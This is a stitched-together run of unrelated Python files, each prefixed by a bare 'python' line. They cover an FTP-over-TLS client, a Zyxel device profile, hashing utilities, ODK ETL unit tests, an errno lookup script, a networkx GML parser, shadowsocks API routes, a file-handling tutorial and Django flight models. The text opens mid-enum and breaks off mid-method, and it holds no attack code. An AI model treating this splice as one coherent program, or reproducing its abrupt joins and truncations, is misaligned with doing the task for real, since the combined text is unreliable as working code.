    CAL_WRIST_ROTATE = "CAL_WRIST_ROTATE"
    CAL_CLAW = "CAL_CLAW"
    CAL_ALL = "CAL_ALL"
    VERSION_QUERY = "VERSION_QUERY"
    REBOOT_CMD = "REBOOT_CMD"
    JOINT_SPEED = "JOINT_SPEED"
    SET_REG = "SET_REG"
    QUERY_REG = "QUERY_REG"
    SAVE_REG = "SAVE_REG"
    WHEEL_LEFT_SPEED = "WHEEL_LEFT_SPEED"
    WHEEL_RIGHT_SPEED = "WHEEL_RIGHT_SPEED"
    QUERY_EVENT = "QUERY_EVENT"
    NONE = "NONE"
python
from __future__ import annotations

from abc import ABC, abstractmethod
from typing import Final, Dict, Optional, final, List, Any
from ftplib import FTP_TLS
from functools import cached_property
import ssl
import os


class FTPClient(ABC):

    HOSTS: Final[Dict[str, Optional[str]]] = {
        'main': 'reefledge-ftp-server-main.com',
        'backup': 'reefledge-ftp-server-backup.com',
    }
    SERVER_PORT: Final[int] = 21

    ftp_tls: FTP_TLS

    def __enter__(self) -> FTPClient:
        self.connect()
        self.login()
        return self

    @final
    def connect(self) -> None:
        self._connect()
        self._enforce_tight_security()

    @abstractmethod
    def _connect(self) -> None:
        pass

    def _enforce_tight_security(self) -> None:
        self.ftp_tls.auth()
        self.ftp_tls.prot_p()

    def _connect_to_main_server(self) -> None:
        self.__connect(host_address=self.HOSTS['main'])

    def _connect_to_backup_server(self) -> None:
        self.__connect(host_address=self.HOSTS['backup'])

    def __connect(self, *, host_address: str) -> None:
        self.ftp_tls = FTP_TLS(context=self.ssl_context)
        self.ftp_tls.connect(host=host_address, port=self.SERVER_PORT)

    @cached_property
    def ssl_context(self) -> ssl.SSLContext:
        try:
            _ssl_context = ssl.create_default_context(cafile=self.ca_file_path)
        except Exception as exception:
            error_message: str = f'Invalid `cafile`: "{self.ca_file_path}"'
            raise exception.__class__(error_message)
        else:
            return _ssl_context

    @cached_property
    def ca_file_path(self) -> str:
        this_directory_name: str = os.path.abspath(os.path.dirname(__file__))
        _ca_file_path = os.path.join(this_directory_name, 'isrgrootx1.pem')
        return _ca_file_path

    @abstractmethod
    def login(self) -> None:
        pass

    def _login(self, *, user_name: str, password: str) -> None:
        self.ftp_tls.login(user=user_name, passwd=password)

    def cwd(self, remote_directory_name: str) -> None:
        self.ftp_tls.cwd(remote_directory_name)

    def list_directory(self, remote_directory_name: str) -> List[str]:
        return self.ftp_tls.nlst(remote_directory_name)

    def __exit__(self, *args: Any) -> None:
        try:
            self.ftp_tls.quit()
        except:
            self.ftp_tls.close()  # Close unilaterally.
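# A minimal concrete subclass sketch for the abstract client above. The
# main-then-backup fallback policy and the credentials are illustrative
# assumptions, not part of the original code.
class MainFTPClient(FTPClient):

    def _connect(self) -> None:
        # Try the main host first; fall back to the backup host on failure.
        try:
            self._connect_to_main_server()
        except OSError:
            self._connect_to_backup_server()

    def login(self) -> None:
        self._login(user_name='example_user', password='example_password')  # hypothetical credentials


# Usage: the context manager wires up connect() and login() automatically.
# with MainFTPClient() as client:
#     print(client.list_directory('.'))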
python
import os

dir_path = os.path.dirname(os.path.realpath(__file__))

name = 'toyui'
namespace = 'toy'
export = 'TOY_UI_EXPORT'
subdir = 'toyui'
dependencies = ['toyobj']
rootdir = dir_path
basetypes = []
python
# This is a script that calculates the WER of different decades in vks_kotus_sample.json.
# Some decades are currently not analysed, as we got a sufficient picture once
# we ensured that there are no excessive gaps of several decades.
# The current corpus is also temporally rather limited, so this is a minor issue.
# In further work, more data from all decades should be included.
# Currently missing decades are 1690, 1720, 1740 and 1770.

from mikatools import *
from collections import Counter
from random import sample, random

from jiwer import wer
import matplotlib.pyplot as plt

test = json_load("old_literary_finnish.json")

x = []
y = []
for year in test:
    ground_truth = []
    hypothesis = []
    for s in year:
        if 'language' not in s:
            ground_truth.append(s['sentence_gt'])
            hypothesis.append(s['sentence_n'])
    error = wer(ground_truth, hypothesis)
    print(year[0]['decade'], error)
    if error > 0.0:
        x.append(year[0]['decade'])
        y.append(error)

plt.plot(x, y)
plt.show()  # display the WER-by-decade curve
python
# ---------------------------------------------------------------------
# Vendor: Zyxel
# OS:     ZyNOS_EE
# ---------------------------------------------------------------------
# Copyright (C) 2007-2011 The NOC Project
# See LICENSE for details
# ---------------------------------------------------------------------

# NOC Modules
from noc.core.profile.base import BaseProfile


class Profile(BaseProfile):
    name = "Zyxel.ZyNOS_EE"
    pattern_password = "Password: "
    pattern_prompt = r"^\S+?> "
    pattern_more = r"^-- more --.*?$"
    command_more = " "
    command_exit = "exit"
    enable_cli_session = False
    command_save_config = "config save"
    pattern_syntax_error = r"^Valid commands are:"
python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author  : qichun tang
# @Date    : 2020-12-15
# @Contact : [email protected]
import hashlib
from copy import deepcopy
from typing import Union, Dict, Any

import numpy as np
from ConfigSpace import Configuration
from scipy.sparse import issparse


def get_hash_of_array(X, m=None):
    if m is None:
        m = hashlib.md5()
    if issparse(X):
        m.update(X.indices)
        m.update(X.indptr)
        m.update(X.data)
        m.update(str(X.shape).encode('utf8'))
    else:
        if X.flags['C_CONTIGUOUS']:
            m.update(X.data)
            m.update(str(X.shape).encode('utf8'))
        else:
            X_tmp = np.ascontiguousarray(X.T)
            m.update(X_tmp.data)
            m.update(str(X_tmp.shape).encode('utf8'))
    hash = m.hexdigest()
    return hash


def sort_dict(obj):
    if isinstance(obj, dict):
        for k, v in obj.items():
            obj[k] = sort_dict(v)
        return dict(sorted(obj.items(), key=lambda x: str(x[0])))
    elif isinstance(obj, list):
        for i, elem in enumerate(obj):
            obj[i] = sort_dict(elem)
        return list(sorted(obj, key=str))
    else:
        return obj


def get_hash_of_dict(dict_, m=None):
    if m is None:
        m = hashlib.md5()
    sorted_dict = sort_dict(deepcopy(dict_))
    # sorted_dict = deepcopy(dict_)
    m.update(str(sorted_dict).encode("utf-8"))
    return m.hexdigest()


def get_hash_of_config(config: Union[Configuration, Dict[str, Any]], m=None):
    if m is None:
        m = hashlib.md5()
    assert isinstance(config, (dict, Configuration))
    if isinstance(config, Configuration):
        config = config.get_dictionary()
    return get_hash_of_dict(config, m)
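# A quick check of the helpers above: the hash is insensitive to dict key
# order (and to list element order) because sort_dict() canonicalizes the
# structure before it is fed to md5.
if __name__ == '__main__':
    a = {'x': 1, 'y': [3, 2, 1]}
    b = {'y': [1, 2, 3], 'x': 1}
    assert get_hash_of_dict(a) == get_hash_of_dict(b)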
python
import unittest

from etl import sources
from unittest.mock import patch, MagicMock


class TestODKSource(unittest.TestCase):

    def test_fix_odk_submission(self):
        """ Testing fix odk submission """
        data = {
            "@a": "a",
            "b": "b",
            "orx:meta": "should_not_be_there"
        }
        # getattr avoids Python's name mangling of double-underscore
        # attributes referenced inside a class body.
        fix_odk_data = getattr(sources, '__fix_odk_data')
        fixed_data = fix_odk_data(data)
        self.assertEqual(fixed_data, {
            "a": "a",
            "b": "b"
        })

    @patch("etl.sources.requests")
    def test_get_odk_submission(self, mock_requests):
        """ Testing get submission """
        result_mock = MagicMock()
        result_mock.text = '<submission xmlns="http://opendatakit.org/submissions" xmlns:orx="http://openrosa.org/xforms" ><data><test_form id="test" instanceID="uuid:7ba84cc0-ef88-4e68-95cd-256a0f4ac0f7" submissionDate="2018-10-25T13:08:58.093Z" isComplete="true" markedAsCompleteDate="2018-10-25T13:08:58.093Z"><person_name>09179615-72fd-4ec9-92d7-fa702358ea54</person_name><orx:meta><orx:instanceID>uuid:7ba84cc0-ef88-4e68-95cd-256a0f4ac0f7</orx:instanceID></orx:meta></test_form></data></submission>'
        result_mock.status_code = 200
        mock_requests.get = MagicMock(return_value=result_mock)

        url = "http://test.test"
        auth = "http-auth"
        get_odk_submission = getattr(sources, '__get_odk_submission')
        result = get_odk_submission(url, auth, "test_form", "uuid-a")
        self.assertEqual(result["person_name"],
                         "09179615-72fd-4ec9-92d7-fa702358ea54")

    @patch("etl.sources.requests")
    @patch("etl.sources.get_odk_submission")
    def test_get_odk_data(self, mock_get_odk_submission, mock_requests):
        """ Testing get submission """
        result_mock = MagicMock()
        result_mock.text = '<idChunk xmlns="http://opendatakit.org/submissions"><idList><id>uuid:7ba84cc0-ef88-4e68-95cd-256a0f4ac0f7</id><id>uuid:bb6e48f4-ef3c-4291-b943-42c8d2a044c1</id><id>uuid:5c1bc811-6542-4221-b50a-054db7ab13ae</id><id>uuid:5c9e3d0a-bacc-4814-b2b3-3c33b6813712</id><id>uuid:8c005761-ae11-4975-a923-e5e55cb12882</id><id>uuid:0d0047e9-8fa4-499b-a5d9-665cd072e9b5</id><id>uuid:0969f963-ae52-404f-82c5-2db451a5e1af</id><id>uuid:121c2dcb-fffd-4f83-a483-5e1ee8b29686</id><id>uuid:60c67f01-b5fa-4595-b15d-cad1f89a8e04</id></idList><resumptionCursor>&lt;cursor xmlns="http://www.opendatakit.org/cursor"&gt;&lt;attributeName&gt;_LAST_UPDATE_DATE&lt;/attributeName&gt;&lt;attributeValue&gt;2018-10-25T13:09:02.355+0000&lt;/attributeValue&gt;&lt;uriLastReturnedValue&gt;uuid:60c67f01-b5fa-4595-b15d-cad1f89a8e04&lt;/uriLastReturnedValue&gt;&lt;isForwardCursor&gt;true&lt;/isForwardCursor&gt;&lt;/cursor&gt;</resumptionCursor></idChunk>'
        result_mock.status_code = 200
        mock_requests.get = MagicMock(return_value=result_mock)
        mock_get_odk_submission.return_value = {"a": "a"}

        data = sources.get_odk_data("test_url", "test_user", "test_password", "test_form")
        mock_get_odk_submission.assert_called_with(
            "test_url",
            mock_requests.auth.HTTPDigestAuth("test_user", "test_password"),
            "test_form",
            "uuid:60c67f01-b5fa-4595-b15d-cad1f89a8e04")
        self.assertEqual(data.columns, ["a"])
        self.assertEqual(len(data), 9)
python
"""Tests for driver.py""" import pytest import pandas as pd from pandas.testing import assert_frame_equal from timeflux.core.io import Port def test_nexus(): assert True
python
# -*- coding: utf-8 -*-

from .file_read_backwards import FileReadBackwards  # noqa: F401

__author__ = """Robin Robin"""
__email__ = '[email protected]'
__version__ = '1.1.2'
__github__ = 'https://github.com/robin81/file_read_backwards'
python
import math
import statistics


class Stats:
    def __init__(self, data):
        self.list = data
        self.length = len(data)
        self.mean = sum(data) / self.length
        # statistics.median handles both even- and odd-length lists,
        # so no even/odd split is needed.
        self.median = statistics.median(data)
        self.mode = statistics.mode(data)
        # Sum of squared deviations, used for variance and standard deviation.
        squared_deviations = sum((x - self.mean) ** 2 for x in data)
        self.variance = squared_deviations / (self.length - 1)      # sample variance
        self.std_dev = math.sqrt(squared_deviations / self.length)  # population std dev
        self.cof_var = self.std_dev / self.mean
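# A worked example for the class above: for [2, 4, 4, 4, 5, 5, 7, 9] the mean
# is 5.0 and the sum of squared deviations is 32, so the sample variance is
# 32/7 and the population standard deviation is sqrt(32/8) = 2.0.
s = Stats([2, 4, 4, 4, 5, 5, 7, 9])
print(s.mean, s.median, s.mode, s.std_dev)  # 5.0 4.5 4 2.0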
python
expected_output = {
    'vll': {
        'MY-QINQ-VLL-LOCAL': {
            'vll_id': 4,
            'ifl_id': '4096',
            'state': 'UP',
            'endpoint': {
                1: {
                    'type': 'tagged',
                    'outer_vlan_id': 100,
                    'inner_vlan_id': 45,
                    'interface': 'ethernet2/1',
                    'cos': '--'
                },
                2: {
                    'type': 'tagged',
                    'vlan_id': 100,
                    'interface': 'ethernet2/3',
                    'cos': '--'
                }
            },
            'extended_counters': True
        }
    }
}
python
""" Given an array A of strings made only from lowercase letters, return a list of all characters that show up in all strings within the list (including duplicates). For example, if a character occurs 3 times in all strings but not 4 times, you need to include that character three times in the final answer. You may return the answer in any order. Example 1: Input: ["bella","label","roller"] Output: ["e","l","l"] """ class Solution1002: pass
python
#! /usr/bin/env python3

from sys import argv

errno = {
    '0': 'Success', '1': 'TooBig', '2': 'Acces', '3': 'Addrinuse',
    '4': 'Addrnotavail', '5': 'Afnosupport', '6': 'Again', '7': 'Already',
    '8': 'Badf', '9': 'Badmsg', '10': 'Busy', '11': 'Canceled',
    '12': 'Child', '13': 'Connaborted', '14': 'Connrefused', '15': 'Connreset',
    '16': 'Deadlk', '17': 'Destaddrreq', '18': 'Dom', '19': 'Dquot',
    '20': 'Exist', '21': 'Fault', '22': 'Fbig', '23': 'Hostunreach',
    '24': 'Idrm', '25': 'Ilseq', '26': 'Inprogress', '27': 'Intr',
    '28': 'Inval', '29': 'Io', '30': 'Isconn', '31': 'Isdir',
    '32': 'Loop', '33': 'Mfile', '34': 'Mlink', '35': 'Msgsize',
    '36': 'Multihop', '37': 'Nametoolong', '38': 'Netdown', '39': 'Netreset',
    '40': 'Netunreach', '41': 'Nfile', '42': 'Nobufs', '43': 'Nodev',
    '44': 'Noent', '45': 'Noexec', '46': 'Nolck', '47': 'Nolink',
    '48': 'Nomem', '49': 'Nomsg', '50': 'Noprotoopt', '51': 'Nospc',
    '52': 'Nosys', '53': 'Notconn', '54': 'Notdir', '55': 'Notempty',
    '56': 'Notrecoverable', '57': 'Notsock', '58': 'Notsup', '59': 'Notty',
    '60': 'Nxio', '61': 'Overflow', '62': 'Ownerdead', '63': 'Perm',
    '64': 'Pipe', '65': 'Proto', '66': 'Protonosupport', '67': 'Prototype',
    '68': 'Range', '69': 'Rofs', '70': 'Spipe', '71': 'Srch',
    '72': 'Stale', '73': 'Timedout', '74': 'Txtbsy', '75': 'Xdev',
    '76': 'Notcapable',
}

desc = {
    'success': 'No error occurred. System call completed successfully.',
    'toobig': 'Argument list too long.',
    'acces': 'Permission denied.',
    'addrinuse': 'Address in use.',
    'addrnotavail': 'Address not available.',
    'afnosupport': 'Address family not supported.',
    'again': 'Resource unavailable, or operation would block.',
    'already': 'Connection already in progress.',
    'badf': 'Bad file descriptor.',
    'badmsg': 'Bad message.',
    'busy': 'Device or resource busy.',
    'canceled': 'Operation canceled.',
    'child': 'No child processes.',
    'connaborted': 'Connection aborted.',
    'connrefused': 'Connection refused.',
    'connreset': 'Connection reset.',
    'deadlk': 'Resource deadlock would occur.',
    'destaddrreq': 'Destination address required.',
    'dom': 'Mathematics argument out of domain of function.',
    'dquot': 'Reserved.',
    'exist': 'File exists.',
    'fault': 'Bad address.',
    'fbig': 'File too large.',
    'hostunreach': 'Host is unreachable.',
    'idrm': 'Identifier removed.',
    'ilseq': 'Illegal byte sequence.',
    'inprogress': 'Operation in progress.',
    'intr': 'Interrupted function.',
    'inval': 'Invalid argument.',
    'io': 'I/O error.',
    'isconn': 'Socket is connected.',
    'isdir': 'Is a directory.',
    'loop': 'Too many levels of symbolic links.',
    'mfile': 'File descriptor value too large.',
    'mlink': 'Too many links.',
    'msgsize': 'Message too large.',
    'multihop': 'Reserved.',
    'nametoolong': 'Filename too long.',
    'netdown': 'Network is down.',
    'netreset': 'Connection aborted by network.',
    'netunreach': 'Network unreachable.',
    'nfile': 'Too many files open in system.',
    'nobufs': 'No buffer space available.',
    'nodev': 'No such device.',
    'noent': 'No such file or directory.',
    'noexec': 'Executable file format error.',
    'nolck': 'No locks available.',
    'nolink': 'Reserved.',
    'nomem': 'Not enough space.',
    'nomsg': 'No message of the desired type.',
    'noprotoopt': 'Protocol not available.',
    'nospc': 'No space left on device.',
    'nosys': 'Function not supported.',
    'notconn': 'The socket is not connected.',
    'notdir': 'Not a directory or a symbolic link to a directory.',
    'notempty': 'Directory not empty.',
    'notrecoverable': 'State not recoverable.',
    'notsock': 'Not a socket.',
    'notsup': 'Not supported, or operation not supported on socket.',
    'notty': 'Inappropriate I/O control operation.',
    'nxio': 'No such device or address.',
    'overflow': 'Value too large to be stored in data type.',
    'ownerdead': 'Previous owner died.',
    'perm': 'Operation not permitted.',
    'pipe': 'Broken pipe.',
    'proto': 'Protocol error.',
    'protonosupport': 'Protocol not supported.',
    'prototype': 'Protocol wrong type for socket.',
    'range': 'Result too large.',
    'rofs': 'Read-only file system.',
    'spipe': 'Invalid seek.',
    'srch': 'No such process.',
    'stale': 'Reserved.',
    'timedout': 'Connection timed out.',
    'txtbsy': 'Text file busy.',
    'xdev': 'Cross-device link.',
    'notcapable': 'Extension: Capabilities insufficient.',
}

if __name__ == '__main__':
    if len(argv) == 1:
        print(f"Usage: {argv[0]} errno ...")
    else:
        for arg in argv[1:]:
            if arg in errno:
                print(f"{arg}: {errno[arg]} -- {desc[errno[arg].lower()]}")
            else:
                print(f"{arg}: ***UNKNOWN ERROR NUMBER***")
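# Example invocation (the script name is hypothetical):
#
#   $ ./wasi_errno.py 2 44
#   2: Acces -- Permission denied.
#   44: Noent -- No such file or directory.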
python
""" Read graphs in GML format. "GML, the G>raph Modelling Language, is our proposal for a portable file format for graphs. GML's key features are portability, simple syntax, extensibility and flexibility. A GML file consists of a hierarchical key-value lists. Graphs can be annotated with arbitrary data structures. The idea for a common file format was born at the GD'95; this proposal is the outcome of many discussions. GML is the standard file format in the Graphlet graph editor system. It has been overtaken and adapted by several other systems for drawing graphs." See http://www.infosun.fim.uni-passau.de/Graphlet/GML/gml-tr.html Requires pyparsing: http://pyparsing.wikispaces.com/ Format ------ See http://www.infosun.fim.uni-passau.de/Graphlet/GML/gml-tr.html for format specification. Example graphs in GML format: http://www-personal.umich.edu/~mejn/netdata/ """ __author__ = """Aric Hagberg ([email protected])""" # Copyright (C) 2008-2010 by # Aric Hagberg <[email protected]> # Dan Schult <[email protected]> # Pieter Swart <[email protected]> # All rights reserved. # BSD license. __all__ = ['read_gml', 'parse_gml', 'generate_gml', 'write_gml'] import networkx as nx from networkx.exception import NetworkXError from networkx.utils import is_string_like, open_file @open_file(0,mode='rb') def read_gml(path,encoding='UTF-8',relabel=False): """Read graph in GML format from path. Parameters ---------- path : filename or filehandle The filename or filehandle to read from. encoding : string, optional Text encoding. relabel : bool, optional If True use the GML node label attribute for node names otherwise use the node id. Returns ------- G : MultiGraph or MultiDiGraph Raises ------ ImportError If the pyparsing module is not available. See Also -------- write_gml, parse_gml Notes ----- Requires pyparsing: http://pyparsing.wikispaces.com/ References ---------- GML specification: http://www.infosun.fim.uni-passau.de/Graphlet/GML/gml-tr.html Examples -------- >>> G=nx.path_graph(4) >>> nx.write_gml(G,'test.gml') >>> H=nx.read_gml('test.gml') """ lines=(line.decode(encoding) for line in path) G=parse_gml(lines,relabel=relabel) return G def parse_gml(lines, relabel=True): """Parse GML graph from a string or iterable. Parameters ---------- lines : string or iterable Data in GML format. relabel : bool, optional If True use the GML node label attribute for node names otherwise use the node id. Returns ------- G : MultiGraph or MultiDiGraph Raises ------ ImportError If the pyparsing module is not available. See Also -------- write_gml, read_gml Notes ----- This stores nested GML attributes as dictionaries in the NetworkX graph, node, and edge attribute structures. 
Requires pyparsing: http://pyparsing.wikispaces.com/ References ---------- GML specification: http://www.infosun.fim.uni-passau.de/Graphlet/GML/gml-tr.html """ try: from pyparsing import ParseException except ImportError: try: from matplotlib.pyparsing import ParseException except: raise ImportError('Import Error: not able to import pyparsing:', 'http://pyparsing.wikispaces.com/') try: data = "".join(lines) gml = pyparse_gml() tokens =gml.parseString(data) except ParseException as err: print((err.line)) print((" "*(err.column-1) + "^")) print(err) raise # function to recursively make dicts of key/value pairs def wrap(tok): listtype=type(tok) result={} for k,v in tok: if type(v)==listtype: result[str(k)]=wrap(v) else: result[str(k)]=v return result # Set flag multigraph=False # but assume multigraphs to start if tokens.directed==1: G=nx.MultiDiGraph() else: G=nx.MultiGraph() for k,v in tokens.asList(): if k=="node": vdict=wrap(v) node=vdict['id'] G.add_node(node,attr_dict=vdict) elif k=="edge": vdict=wrap(v) source=vdict.pop('source') target=vdict.pop('target') if G.has_edge(source,target): multigraph=True G.add_edge(source,target,attr_dict=vdict) else: G.graph[k]=v # switch to Graph or DiGraph if no parallel edges were found. if not multigraph: if G.is_directed(): G=nx.DiGraph(G) else: G=nx.Graph(G) if relabel: # relabel, but check for duplicate labels first mapping=[(n,d['label']) for n,d in G.node.items()] x,y=zip(*mapping) if len(set(y))!=len(G): raise NetworkXError('Failed to relabel nodes: ' 'duplicate node labels found. ' 'Use relabel=False.') G=nx.relabel_nodes(G,dict(mapping)) return G def pyparse_gml(): """A pyparsing tokenizer for GML graph format. This is not intended to be called directly. See Also -------- write_gml, read_gml, parse_gml """ try: from pyparsing import \ Literal, CaselessLiteral, Word, Forward,\ ZeroOrMore, Group, Dict, Optional, Combine,\ ParseException, restOfLine, White, alphas, alphanums, nums,\ OneOrMore,quotedString,removeQuotes,dblQuotedString, Regex except ImportError: try: from matplotlib.pyparsing import \ Literal, CaselessLiteral, Word, Forward,\ ZeroOrMore, Group, Dict, Optional, Combine,\ ParseException, restOfLine, White, alphas, alphanums, nums,\ OneOrMore,quotedString,removeQuotes,dblQuotedString, Regex except: raise ImportError('pyparsing not found', 'http://pyparsing.wikispaces.com/') lbrack = Literal("[").suppress() rbrack = Literal("]").suppress() pound = ("#") comment = pound + Optional( restOfLine ) integer = Word(nums+'-').setParseAction(lambda s,l,t:[ int(t[0])]) real = Regex(r"[+-]?\d+\.\d*([eE][+-]?\d+)?").setParseAction( lambda s,l,t:[ float(t[0]) ]) dblQuotedString.setParseAction( removeQuotes ) key = Word(alphas,alphanums+'_') value_atom = (real | integer | Word(alphanums) | dblQuotedString) value = Forward() # to be defined later with << operator keyvalue = Group(key+value) value << (value_atom | Group( lbrack + ZeroOrMore(keyvalue) + rbrack )) node = Group(Literal("node") + lbrack + Group(OneOrMore(keyvalue)) + rbrack) edge = Group(Literal("edge") + lbrack + Group(OneOrMore(keyvalue)) + rbrack) creator = Group(Literal("Creator")+ Optional( restOfLine )) version = Group(Literal("Version")+ Optional( restOfLine )) graphkey = Literal("graph").suppress() graph = Dict (Optional(creator)+Optional(version)+\ graphkey + lbrack + ZeroOrMore( (node|edge|keyvalue) ) + rbrack ) graph.ignore(comment) return graph def generate_gml(G): """Generate a single entry of the graph G in GML format. 
Parameters ---------- G : NetworkX graph Returns ------- lines: string Lines in GML format. Notes ----- This implementation does not support all Python data types as GML data. Nodes, node attributes, edge attributes, and graph attributes must be either dictionaries or single stings or numbers. If they are not an attempt is made to represent them as strings. For example, a list as edge data G[1][2]['somedata']=[1,2,3], will be represented in the GML file as:: edge [ source 1 target 2 somedata "[1, 2, 3]" ] """ # recursively make dicts into gml brackets def listify(d,indent,indentlevel): result='[ \n' for k,v in d.items(): if type(v)==dict: v=listify(v,indent,indentlevel+1) result += indentlevel*indent+"%s %s\n"%(k,v) return result+indentlevel*indent+"]" def string_item(k,v,indent): # try to make a string of the data if type(v)==dict: v=listify(v,indent,2) elif is_string_like(v): v='"%s"'%v elif type(v)==bool: v=int(v) return "%s %s"%(k,v) # check for attributes or assign empty dict if hasattr(G,'graph_attr'): graph_attr=G.graph_attr else: graph_attr={} if hasattr(G,'node_attr'): node_attr=G.node_attr else: node_attr={} indent=2*' ' count=iter(range(len(G))) node_id={} yield "graph [" if G.is_directed(): yield indent+"directed 1" # write graph attributes for k,v in G.graph.items(): yield indent+string_item(k,v,indent) # write nodes for n in G: yield indent+"node [" # get id or assign number nid=G.node[n].get('id',next(count)) node_id[n]=nid yield 2*indent+"id %s"%nid label=G.node[n].pop('label',n) if is_string_like(label): label='"%s"'%label yield 2*indent+'label %s'%label if n in G: for k,v in G.node[n].items(): if k=='id': continue yield 2*indent+string_item(k,v,indent) yield indent+"]" # write edges for u,v,edgedata in G.edges_iter(data=True): yield indent+"edge [" yield 2*indent+"source %s"%node_id[u] yield 2*indent+"target %s"%node_id[v] for k,v in edgedata.items(): if k=='source': continue if k=='target': continue yield 2*indent+string_item(k,v,indent) yield indent+"]" yield "]" @open_file(1,mode='wb') def write_gml(G, path): """ Write the graph G in GML format to the file or file handle path. Parameters ---------- path : filename or filehandle The filename or filehandle to write. Filenames ending in .gz or .gz2 will be compressed. See Also -------- read_gml, parse_gml Notes ----- GML specifications indicate that the file should only use 7bit ASCII text encoding.iso8859-1 (latin-1). This implementation does not support all Python data types as GML data. Nodes, node attributes, edge attributes, and graph attributes must be either dictionaries or single stings or numbers. If they are not an attempt is made to represent them as strings. For example, a list as edge data G[1][2]['somedata']=[1,2,3], will be represented in the GML file as:: edge [ source 1 target 2 somedata "[1, 2, 3]" ] Examples --------- >>> G=nx.path_graph(4) >>> nx.write_gml(G,"test.gml") Filenames ending in .gz or .bz2 will be compressed. >>> nx.write_gml(G,"test.gml.gz") """ for line in generate_gml(G): line+='\n' path.write(line.encode('latin-1')) # fixture for nose tests def setup_module(module): from nose import SkipTest try: import pyparsing except: try: import matplotlib.pyparsing except: raise SkipTest("pyparsing not available") # fixture for nose tests def teardown_module(module): import os os.unlink('test.gml') os.unlink('test.gml.gz')
python
# py2.7 and py3 compatibility imports
from __future__ import absolute_import
from __future__ import unicode_literals

from django.conf.urls import url, include
from rest_framework import routers

from . import views

router = routers.DefaultRouter()
router.register(r'shadowsocks/config', views.ConfigViewSet)
router.register(r'shadowsocks/account', views.AccountViewSet)
router.register(r'shadowsocks/node', views.NodeViewSet)
router.register(r'shadowsocks/nodeaccount', views.NodeAccountViewSet)
router.register(r'shadowsocks/ssmanager', views.SSManagerViewSet)

urlpatterns = [
    url(r'^', include(router.urls)),
]
python
'''
Working with files in Python
'''

# reading and writing files
path_to_file = '00 - Very Basics/text_files/'

file_name1 = input('What is the file name you want to write to? ')
try:
    file1 = open('{}/{}.txt'.format(path_to_file, file_name1), 'w')
    file1.write('''
You don't know how to be a man
I open myself, you close me,
I want to run, but you catch me again,
I want to cry out, you tell me to shut up,
Why do I do it?
I throw myself, like a child
I listen to you, pleasant, humble
Why do I do it?
Why don't I leave, why do I settle?
I gave you power over me,
I am strong but not this way, but not now
When do I have to say it;
How do I say it to you?
You don't know how to be a man
For a girl.
You didn't even try,
Not even once.
My argument is mute,
It's just for me.
You don't know how to be a man
And nobody teaches you how.
''')
    file1.close()
except FileNotFoundError as error:
    print(error)
else:
    print('Text file was correctly created/written.')

file_name2 = input('What is the file name you want to read from? ')
try:
    file2 = open('{}/{}.txt'.format(path_to_file, file_name2), 'r')
    print(file2.read())
    file2.close()
except FileNotFoundError as error:
    print(error)
else:
    print('File was read correctly.')

print(file1.closed)
print(file2.closed)

try:
    with open('{}/{}.txt'.format(path_to_file, file_name2)) as myFile:
        print(myFile.read())
except FileNotFoundError as error:
    print(error)

songs = [
    'Visele',
    'Iubirea noastra muta',
    'Da\' ce tu',
    'Haina ta',
    'Ce s-a intamplat cu noi',
    'My Favourite Man',
    'Bandana',
    'Bolnavi amandoi',
    'Cosmos',
    'Octombrie Rosu',
    'Eroii pieselor noastre',
    'Beau',
    'In locul meu',
    'Cel mai bun prieten',
    'Nu stii tu sa fii barbat'
]

try:
    with open('{}/{}'.format(path_to_file, 'irina_rimes_songs.txt'), 'w') as songs_file:
        for song in songs:
            songs_file.write('{}\n'.format(song))
except FileNotFoundError as error:
    print(error)

try:
    with open('{}/{}'.format(path_to_file, 'irina_rimes_songs1.txt'), 'w') as songs_file:
        for song in songs:
            songs_file.writelines('%s\n' % song)
except FileNotFoundError as error:
    print(error)

with open('{}/{}'.format(path_to_file, 'irina_rimes_songs1.txt')) as songs_file:
    print(songs_file.readline(10))
    print(songs_file.tell())
    print(songs_file.readlines())

with open('{}/{}'.format(path_to_file, 'irina_rimes_songs1.txt')) as songs_file:
    print(songs_file.tell())
    songs_file.seek(10, 0)
    print(songs_file.tell())
    print(songs_file.read(15))
    print(songs_file.tell())

with open('{}/{}'.format(path_to_file, 'irina_rimes_songs1.txt'), 'r+') as songs_file:
    songs_file.seek(0, 2)
    print(songs_file.tell())
    songs_file.write('Hello')

# os module
import os

print(os.getcwd())
# print(os.get_exec_path())

try:
    os.mkdir('nice_folder')
except Exception:
    pass
print(os.path.isdir('nice_folder'))

try:
    os.rename('nice_folder', 'ugly_folder')
except Exception:
    pass
print(os.path.isdir('nice_folder'))

try:
    os.remove('ugly_folder')
except Exception as error:
    print(error)
python
from django.contrib.auth import get_user_model
from django.db import models, transaction
from django.utils import timezone
from django.utils.translation import ugettext_lazy as _

from libs.models import BaseModel

User = get_user_model()


class State(BaseModel):
    name = models.CharField(verbose_name=_('name'), max_length=80)

    def __str__(self):
        return self.name

    class Meta:
        verbose_name = _('State')
        verbose_name_plural = _('States')
        db_table = 'state'


class City(BaseModel):
    name = models.CharField(verbose_name=_('name'), max_length=80)
    state = models.ForeignKey(State, related_name='cities', on_delete=models.CASCADE, verbose_name=_('state'))

    def __str__(self):
        return f'{self.name} - {self.state}'

    class Meta:
        verbose_name = _('City')
        verbose_name_plural = _('Cities')
        db_table = 'city'


class AirLine(BaseModel):
    name = models.CharField(verbose_name=_('name'), max_length=80)

    def __str__(self):
        return self.name

    class Meta:
        verbose_name = _('Air Line')
        verbose_name_plural = _('Air Lines')
        db_table = 'airline'


class Plane(BaseModel):
    name = models.CharField(verbose_name=_('name'), max_length=50)
    airline = models.ForeignKey(AirLine, related_name='planes', on_delete=models.CASCADE, verbose_name=_('air line'))
    capacity = models.PositiveSmallIntegerField(verbose_name=_('capacity'))

    def __str__(self):
        return f'{self.name} - {self.airline} - {self.capacity}'

    class Meta:
        verbose_name = _('Plane')
        verbose_name_plural = _('Planes')
        db_table = 'plane'


class Flight(BaseModel):
    flight_number = models.CharField(max_length=150, verbose_name=_('flight number'))
    plane = models.ForeignKey(Plane, related_name='flights', on_delete=models.CASCADE, verbose_name=_('plane'))
    from_city = models.ForeignKey(
        City, related_name='origin_flights', on_delete=models.CASCADE, verbose_name=_('origin')
    )
    to_city = models.ForeignKey(
        City, related_name='destination_flights', on_delete=models.CASCADE, verbose_name=_('destination')
    )
    depart_datetime = models.DateTimeField(verbose_name=_('depart datetime'))
    arrive_datetime = models.DateTimeField(verbose_name=_('arrive datetime'))
    price = models.IntegerField(verbose_name=_('price'))

    def prototype_create_seats(self):
        for c in range(1, self.plane.capacity + 1):
